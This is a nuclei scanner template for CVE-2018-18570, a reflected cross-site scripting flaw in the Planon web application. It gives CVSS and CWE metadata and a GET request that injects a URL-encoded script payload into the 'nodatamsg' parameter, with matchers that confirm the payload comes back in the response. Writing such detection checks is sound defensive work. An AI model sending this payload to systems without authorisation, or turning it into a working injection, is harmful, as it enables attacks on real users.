nuclei-templates/cves/2018/CVE-2018-18570.yaml

38 lines
1.0 KiB
YAML

id: CVE-2018-18570
info:
name: Cross-Site Scripting on Planon web application
author: emadshanab
severity: medium
description: Planon before Live Build 41 has XSS
reference:
- https://www2.deloitte.com/de/de/pages/risk/articles/planon-cross-site-scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-18570
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-18570
cwe-id: CWE-79
tags: xss,cve,cve2018,planon
requests:
- method: GET
path:
- '{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header